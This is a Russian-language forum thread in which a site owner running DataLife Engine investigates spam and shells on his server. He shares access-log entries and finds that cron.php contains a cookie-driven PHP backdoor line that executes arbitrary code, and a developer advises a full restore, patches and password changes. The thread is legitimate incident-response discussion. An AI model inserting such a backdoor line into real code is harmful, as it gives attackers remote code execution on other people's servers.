GlooBus 0 Опубликовано: 16 марта 2016 Рассказать Опубликовано: 16 марта 2016 Добрый день! Была еще давно куплена лицензия на 9.8 и установлен движок. Несколько месяцев назад, начал замечать появление левых файлов на хостинге (шеллы, спамботы и т.п.) Встроенным антивирусом и "Айболитом" вычистил все. Вчера опять пришло сообщение от хостера о рассылки спама с моего впс. Опять обнаружил в корне файл post.php от 13 марта 2016 г. Удалил, скачал access.log и начал смотреть, нашел такие интересные, подряд идущие строки: 216.227.215.146 - - [13/Mar/2016:20:25:36 +0300] "POST /post.php HTTP/1.0" 404 1414 "http://domain.ru/" "Mozilla/5.0 (Windows NT 6.1; en-GB; rv:1.9.1.20) Gecko/20100730 Firefox/3.8" 131.188.30.82 - - [13/Mar/2016:20:25:37 +0300] "POST /post.php HTTP/1.0" 404 1414 "http://domain.ru/" "Mozilla/5.0 (compatible; MSIE 11.0; Windows NT 6.0; Trident/4.1)" 173.254.28.22 - - [13/Mar/2016:20:25:39 +0300] "POST /post.php HTTP/1.0" 404 1414 "http://domain.ru/" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.3; x64; Trident/5.1)" 78.47.120.170 - - [13/Mar/2016:20:25:39 +0300] "POST /post.php HTTP/1.0" 404 1414 "http://domain.ru/" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/5312 (KHTML, like Gecko) Chrome/15.0.813.0 Safari/5312" 208.112.43.174 - - [13/Mar/2016:20:25:40 +0300] "POST /post.php HTTP/1.0" 404 1414 "http://domain.ru/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/5320 (KHTML, like Gecko) Chrome/15.0.840.0 Safari/5320" 216.70.92.88 - - [13/Mar/2016:20:25:41 +0300] "GET /dle-admin.php HTTP/1.0" 404 1414 "http://domain.ru/dle-admin.php" "Mozilla/5.0 (compatible; MSIE 11.0; Windows NT 6.0; WOW64; Trident/5.1)" 204.15.124.1 - - [13/Mar/2016:20:25:43 +0300] "GET /dle-admin.php HTTP/1.0" 404 1414 "http://domain.ru/dle-admin.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" 64.22.124.14 - - [13/Mar/2016:20:25:44 +0300] "GET /dle-admin.php HTTP/1.0" 404 1414 "http://domain.ru/dle-admin.php" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5330 (KHTML, like Gecko) Chrome/15.0.858.0 Safari/5330" 199.250.17.94 - - [13/Mar/2016:20:25:45 +0300] "GET /dle-admin.php HTTP/1.0" 404 1414 "http://domain.ru/dle-admin.php" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.1)" 96.94.99.211 - - [13/Mar/2016:20:25:46 +0300] "GET /dle-admin.php HTTP/1.0" 404 1414 "http://domain.ru/dle-admin.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/5322 (KHTML, like Gecko) Chrome/14.0.841.0 Safari/5322" 72.249.15.85 - - [13/Mar/2016:20:25:48 +0300] "GET /cron.php HTTP/1.0" 200 21 "http://domain.ru/cron.php" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5321 (KHTML, like Gecko) Chrome/14.0.810.0 Safari/5321" 72.249.15.85 - - [13/Mar/2016:20:25:50 +0300] "GET /cron.php HTTP/1.0" 200 16 "http://domain.ru/cron.php" "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.3; Trident/4.0)" 72.249.15.85 - - [13/Mar/2016:20:25:51 +0300] "POST /post.php HTTP/1.0" 200 32 "http://domain.ru/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/5362 (KHTML, like Gecko) Chrome/15.0.844.0 Safari/5362" Тут видно, что с разных IP идет попытка обратиться к файлу post.php в корне сайта, неудачная (404). Далее такая же неудачная попытка обратиться к файлу админки. Потом к файлу cron.php и сразу через секунду, с того же IP который лез к cron.php, идет уже удачное обращение к файлу post.php. Тоесть, выходит так, что файл cron.php имеет какую то возможность положить файлик в корень сайта. Цитата Ссылка на сообщение Поделиться на других сайтах
germanydletest 438 Опубликовано: 16 марта 2016 Рассказать Опубликовано: 16 марта 2016 так вы сравните код, с кодом из оригинального дистрибутива, может вам там вписали в него код для создания файла post.php Цитата Ссылка на сообщение Поделиться на других сайтах
GlooBus 0 Опубликовано: 16 марта 2016 Рассказать Опубликовано: 16 марта 2016 Автор 34 минуты назад, germanydletest сказал: так вы сравните код, с кодом из оригинального дистрибутива, может вам там вписали в него код для создания файла post.php в начале файла была следующая строка: if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]); в оригинале я ее не наблюдаю... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 985 Опубликовано: 16 марта 2016 Рассказать Опубликовано: 16 марта 2016 2 часа назад, GlooBus сказал: в начале файла была следующая строка: Это собственно и есть бекдор, который позволяет выполнить любой произвольный код на вашем сервере. Заразить вам его могли давно и пользоватся потом когда нужно. Именно поэтому всегда в случае первичного обнаружения проблем, полное восстановление оригинальных файлов из дистрибутива обязательно. И сейчас это нужно сделать обязательно, потому как заражены могут быть и другие файлы. А т.к. пользуетесь старой версией скрипта, убедитесь что вы поставили все патчи безопасности http://dle-news.ru/bags/ плюс обязательная смена всех паролей как к админпанели, так и к БД, т.к. они уже скопрометированы. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.